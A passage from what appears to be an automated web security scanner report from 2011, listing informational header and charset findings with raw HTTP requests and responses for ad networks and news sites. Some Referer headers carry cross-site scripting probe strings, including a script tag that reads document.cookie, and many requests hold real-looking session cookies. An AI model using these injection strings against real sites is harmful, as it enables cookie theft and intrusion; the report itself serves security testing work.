Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.0.10.1296766388; __utmc=91933981; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11

Response

HTTP/1.1 200 OK
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset: UTF-8
Age: 370051
Date: Thu, 03 Feb 2011 20:52:26 GMT
Expires: Fri, 26 Jul 2030 05:00:00 GMT
Connection: keep-alive
Content-Length: 247853


var MooTools={'version':'1.2.1','build':'0d4845aab3d9a4fdee2f0d4a6dd59210e4b697cf'};var Native=function(options){options=options||{};var name=options.name;var legacy=options.legacy;var protect=option
...[SNIP]...
<head>\n<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />\n');newwin.document.write('<meta http-equiv="Imagetoolbar" content="no" />
...[SNIP]...

28.2. http://sr2.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /visitor/addons/deploy.asp?site=6964264&d_id=1 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/browse/home/shop_ipod/family/ipod_classic?mco=MTM3NTMxMzA
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
max-age: 1800
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: public, max-age=53196
Date: Thu, 03 Feb 2011 17:50:32 GMT
Connection: close
Content-Length: 20

lpAddMonitorTag();

29. HTML does not specify charset  previous  next
There are 50 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


29.1. http://2e76.v.fwmrm.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /

Request

GET / HTTP/1.1
Host: 2e76.v.fwmrm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cph="1295039779.438.1.1,"; _sid="c110_5569572937864193463"; _sc="sg12288.1296767252.1296767690.28800.412.22,"; _auv="g12288~1.1296767276.412,4.1296767649.172,12720.1296767276.412,12722.1296767649.172,^"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _cvr="1296767690^11894^sg12288~sg11948^0~0^412.000000~22.750000,"; _uid="a104_5562153497824379009"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3145525d5f4f58455e445a4a423209; _wr="g12288"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,";

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "2210165280"
Last-Modified: Thu, 08 Apr 2010 22:35:44 GMT
Content-Length: 10
Date: Thu, 03 Feb 2011 22:03:03 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

NJBads010

29.2. http://abcnews.go.com/Sports/wireStory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /Sports/wireStory

Request

GET /Sports/wireStory HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:31:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc05
X-Powered-By: ASP.NET
Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...

29.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Request

GET /adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6376

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

29.4. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.24

Request

GET /adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_3247**15stqp6ba7xf0___3533310**0_3805*MXc_114**_-862839443;ord=5575236558291927040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:59:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6367

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

29.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Request

GET /adi/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4965
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:54:50 GMT
Expires: Fri, 04 Feb 2011 17:54:50 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

29.6. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:59:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/
...[SNIP]...

29.7. http://adcontent.videoegg.com/alternates/tucows_alt_300x250.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adcontent.videoegg.com
Path:   /alternates/tucows_alt_300x250.html

Request

GET /alternates/tucows_alt_300x250.html HTTP/1.1
Host: adcontent.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=1&cb=975bbd80
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "ca11a1b46c51def119df69484390bc21:1287162717"
Last-Modified: Fri, 15 Oct 2010 16:10:34 GMT
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=1800
Expires: Fri, 04 Feb 2011 02:53:00 GMT
Date: Fri, 04 Feb 2011 02:23:00 GMT
Connection: close
Content-Length: 377

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
</head>

<body>


<a href="http://www.anrdoezrs.ne
...[SNIP]...

29.8. http://adcontent.videoegg.com/alternates/tucows_default_728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adcontent.videoegg.com
Path:   /alternates/tucows_default_728x90.html

Request

GET /alternates/tucows_default_728x90.html HTTP/1.1
Host: adcontent.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "3e9166198fc1249077d29d8916298064:1289337182"
Last-Modified: Tue, 09 Nov 2010 21:11:27 GMT
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=1800
Expires: Thu, 03 Feb 2011 21:21:19 GMT
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Content-Length: 272

<a href="http://www.tkqlhce.com/3566uoxuowBFDKGCDCBDCILCHDH" target="_blank" onmouseover="window.status='http://www.pctools.com';return true;" onmouseout="window.status=' ';return true;">
<img src="ht
...[SNIP]...

29.9. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1443976/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1443976/0/0/ADTECH

Request

GET /adrawdata/3.0/5108.1/1443976/0/0/ADTECH;kvinvtype=display;kvrid=12dee7b87149f052badfd9a8c000af6b;kvexpandable=0;kvdim=300x250;kvbw=0;kvpid=1443976;kvgf=138;kva3554=124;kvagt18=103;kvagt35=113;kvagt25=106 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 98

var ve_am = { "housead": "true", "adid" : "1242536-1", "ccid": "1242536-1", "reason": "IFRAME" };

29.10. http://blog.supermedia.com/comment_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_form.php

Request

GET /comment_form.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 37
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

You+must+enter+a+valid+email+address.

29.11. http://blog.supermedia.com/comment_html.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Request

GET /comment_html.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 51
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

<script type="text/javascript">alert("");</script>

29.12. http://c.brightcove.com/services/messagebroker/amf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:47:35 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

29.13. https://cbi.boldchat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: cbi.boldchat.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Resin/2.1.17
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html
Connection: close
Date: Thu, 03 Feb 2011 19:50:56 GMT
Content-Length: 625


<html>
<head>
<title>Error</title>
</head>
<body>
<STYLE TYPE="text/css">
<!--
.err {
font-family: verdana, arial, helvetica, sans-serif;
font-size: 1.2em;
font-weight: bold;
padding:
...[SNIP]...

29.14. http://cdn.unicast.msn.com/script/V3.00/deliver2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.unicast.msn.com
Path:   /script/V3.00/deliver2.html

Request

GET /script/V3.00/deliver2.html?pid=65369&cid=12223&pub=1473&a=406199&VwDebug=false&pc=406195&exp=%27020317%27&fc=false&sc=false&png=''&pip=''&tpi=''&rd=0.4332537694337582 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: cdn.unicast.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1800
Content-Type: text/html
Accept-Ranges: bytes
ETag: "04bab11e397cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Age: 1029
Date: Fri, 04 Feb 2011 02:29:45 GMT
Last-Modified: Thu, 09 Dec 2010 20:53:02 GMT
Expires: Fri, 04 Feb 2011 02:42:33 GMT
Connection: keep-alive
Content-Length: 8975

<html><head><script language="javascript">var VwVer="V3.00",VwBld="3.6_59 [06 18 2010]";var VwInDeliver2=true;q=document.location.search.substring(1);s=unescape(q);if(navigator.userAgent.indexOf("NT 5
...[SNIP]...

29.15. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_0.html

Request

GET /prod/ig/110121-160940_adv_0.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:59 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af87-13f23-456cadc0"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 07:52:39 GMT
Age: 50840
Content-Type: text/html
Vary: Accept-Encoding
Last-Modified: Sat, 22 Jan 2011 00:15:59 GMT
Connection: keep-alive
Content-Length: 81699

L=[["autos.aol.com/?icid=navbar_Autos",[6,684]],["autos.msn.com/default.aspx",[6,839]],["autos.yahoo.com/",[6,684]],["www.autobytel.com/",6],["www.automotive.com/index.html",6],["www.autotrader.com/",
...[SNIP]...

29.16. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.trafficmp.com
Path:   /prod/ig/110121-160940_adv_1.html

Request

GET /prod/ig/110121-160940_adv_1.html HTTP/1.1
Host: cdn1.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html?pid=2331&plid=23663
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1296770448506; ig=0; lp=0; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:00 GMT
Server: PWS/1.7.1.2
X-Px: ht mia-agg-n23.panthercdn.com
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT", CP="COM NAV INT STA NID OUR IND NOI"
ETag: "943af78-17ea8-456cadc0"
Cache-Control: max-age=86400
